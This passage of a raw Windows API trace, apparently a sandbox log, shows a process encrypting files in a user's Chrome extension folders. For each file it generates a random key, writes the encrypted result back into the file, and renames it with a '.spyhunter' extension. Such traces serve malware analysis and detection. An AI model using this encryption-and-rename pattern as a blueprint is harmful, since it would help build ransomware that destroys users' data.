0x2c321c8 [0135.512] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f56c*=0xb3, lpOverlapped=0x0) returned 1 [0135.513] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.513] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f56c*=0xb3, lpOverlapped=0x0) returned 1 [0135.513] GetProcessHeap () returned 0x2c0000 [0135.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.513] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.513] WriteFile (in: hFile=0x188, lpBuffer=0x57f5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f56c, lpOverlapped=0x0 | out: lpBuffer=0x57f5ac*, lpNumberOfBytesWritten=0x57f56c*=0x4, lpOverlapped=0x0) returned 1 [0135.514] WriteFile (in: hFile=0x188, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f56c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f56c*=0x30, lpOverlapped=0x0) returned 1 [0135.514] CloseHandle (hObject=0x188) returned 1 [0135.514] GetProcessHeap () returned 0x2c0000 [0135.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.514] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.spyhunter") returned 167 [0135.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0135.515] GetProcessHeap () returned 0x2c0000 [0135.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.515] GetProcessHeap () returned 0x2c0000 [0135.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.515] GetProcessHeap () returned 0x2c0000 [0135.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81730 | out: hHeap=0x2c0000) returned 1 [0135.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5a8 | out: pbBuffer=0x57f5a8) returned 1 [0135.516] GetProcessHeap () returned 0x2c0000 [0135.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5a0*=0x30) returned 1 [0135.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0135.517] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0135.517] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.517] GetProcessHeap () returned 0x2c0000 [0135.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.517] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f564*=0xb3, lpOverlapped=0x0) returned 1 [0135.518] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.518] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f564*=0xb3, lpOverlapped=0x0) returned 1 [0135.518] GetProcessHeap () returned 0x2c0000 [0135.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.518] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.518] WriteFile (in: hFile=0x188, lpBuffer=0x57f5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f564, lpOverlapped=0x0 | out: lpBuffer=0x57f5a4*, lpNumberOfBytesWritten=0x57f564*=0x4, lpOverlapped=0x0) returned 1 [0135.518] WriteFile (in: hFile=0x188, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f564, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f564*=0x30, lpOverlapped=0x0) returned 1 [0135.519] CloseHandle (hObject=0x188) returned 1 [0135.519] GetProcessHeap () returned 0x2c0000 [0135.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.519] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.spyhunter") returned 167 [0135.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0135.519] GetProcessHeap () returned 0x2c0000 [0135.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.520] GetProcessHeap () returned 0x2c0000 [0135.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.520] GetProcessHeap () returned 0x2c0000 [0135.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f815a8 | out: hHeap=0x2c0000) returned 1 [0135.520] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5a0 | out: pbBuffer=0x57f5a0) returned 1 [0135.520] GetProcessHeap () returned 0x2c0000 [0135.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.520] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f598*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f598*=0x30) returned 1 [0135.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0135.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0135.521] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0135.521] GetProcessHeap () returned 0x2c0000 [0135.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.521] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f55c*=0xd4e, lpOverlapped=0x0) returned 1 [0135.652] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffff2b2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.652] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd4e, lpNumberOfBytesWritten=0x57f55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f55c*=0xd4e, lpOverlapped=0x0) returned 1 [0135.652] GetProcessHeap () returned 0x2c0000 [0135.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.652] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.652] WriteFile (in: hFile=0x188, lpBuffer=0x57f59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f55c, lpOverlapped=0x0 | out: lpBuffer=0x57f59c*, lpNumberOfBytesWritten=0x57f55c*=0x4, lpOverlapped=0x0) returned 1 [0135.652] WriteFile (in: hFile=0x188, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f55c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f55c*=0x30, lpOverlapped=0x0) returned 1 [0135.652] CloseHandle (hObject=0x188) returned 1 [0135.652] GetProcessHeap () returned 0x2c0000 [0135.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.653] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.spyhunter") returned 149 [0135.653] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.spyhunter")) returned 1 [0135.654] GetProcessHeap () returned 0x2c0000 [0135.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.654] GetProcessHeap () returned 0x2c0000 [0135.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.654] GetProcessHeap () returned 0x2c0000 [0135.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17c78 | out: hHeap=0x2c0000) returned 1 [0136.048] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f590 | out: pbBuffer=0x57f590) returned 1 [0136.048] GetProcessHeap () returned 0x2c0000 [0136.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.048] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f588*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f588*=0x30) returned 1 [0136.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0136.049] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0136.049] GetProcessHeap () returned 0x2c0000 [0136.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.049] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f54c*=0x5f, lpOverlapped=0x0) returned 1 [0136.050] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.051] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x57f54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f54c*=0x5f, lpOverlapped=0x0) returned 1 [0136.051] GetProcessHeap () returned 0x2c0000 [0136.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.051] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.051] WriteFile (in: hFile=0xec, lpBuffer=0x57f58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f54c, lpOverlapped=0x0 | out: lpBuffer=0x57f58c*, lpNumberOfBytesWritten=0x57f54c*=0x4, lpOverlapped=0x0) returned 1 [0136.051] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f54c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f54c*=0x30, lpOverlapped=0x0) returned 1 [0136.051] CloseHandle (hObject=0xec) returned 1 [0136.058] GetProcessHeap () returned 0x2c0000 [0136.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.058] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.spyhunter") returned 147 [0136.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.spyhunter")) returned 1 [0136.059] GetProcessHeap () returned 0x2c0000 [0136.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.059] GetProcessHeap () returned 0x2c0000 [0136.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.059] GetProcessHeap () returned 0x2c0000 [0136.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc6eb0 | out: hHeap=0x2c0000) returned 1 [0136.059] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f588 | out: pbBuffer=0x57f588) returned 1 [0136.059] GetProcessHeap () returned 0x2c0000 [0136.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.059] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f580*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f580*=0x30) returned 1 [0136.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0136.060] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0136.060] GetProcessHeap () returned 0x2c0000 [0136.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.060] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f544*=0x5c, lpOverlapped=0x0) returned 1 [0136.061] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.062] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f544*=0x5c, lpOverlapped=0x0) returned 1 [0136.062] GetProcessHeap () returned 0x2c0000 [0136.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.062] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.062] WriteFile (in: hFile=0xec, lpBuffer=0x57f584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x57f584*, lpNumberOfBytesWritten=0x57f544*=0x4, lpOverlapped=0x0) returned 1 [0136.062] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f544*=0x30, lpOverlapped=0x0) returned 1 [0136.062] CloseHandle (hObject=0xec) returned 1 [0136.062] GetProcessHeap () returned 0x2c0000 [0136.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.063] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.spyhunter") returned 149 [0136.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.spyhunter")) returned 1 [0136.063] GetProcessHeap () returned 0x2c0000 [0136.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.064] GetProcessHeap () returned 0x2c0000 [0136.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.064] GetProcessHeap () returned 0x2c0000 [0136.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17958 | out: hHeap=0x2c0000) returned 1 [0136.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f588 | out: pbBuffer=0x57f588) returned 1 [0136.064] GetProcessHeap () returned 0x2c0000 [0136.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.064] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f580*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f580*=0x30) returned 1 [0136.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0136.065] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0136.065] GetProcessHeap () returned 0x2c0000 [0136.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.065] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f544*=0x9d, lpOverlapped=0x0) returned 1 [0136.066] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.067] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x9d, lpNumberOfBytesWritten=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f544*=0x9d, lpOverlapped=0x0) returned 1 [0136.067] GetProcessHeap () returned 0x2c0000 [0136.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.067] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.067] WriteFile (in: hFile=0xec, lpBuffer=0x57f584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x57f584*, lpNumberOfBytesWritten=0x57f544*=0x4, lpOverlapped=0x0) returned 1 [0136.067] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f544, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f544*=0x30, lpOverlapped=0x0) returned 1 [0136.067] CloseHandle (hObject=0xec) returned 1 [0136.068] GetProcessHeap () returned 0x2c0000 [0136.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.068] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: 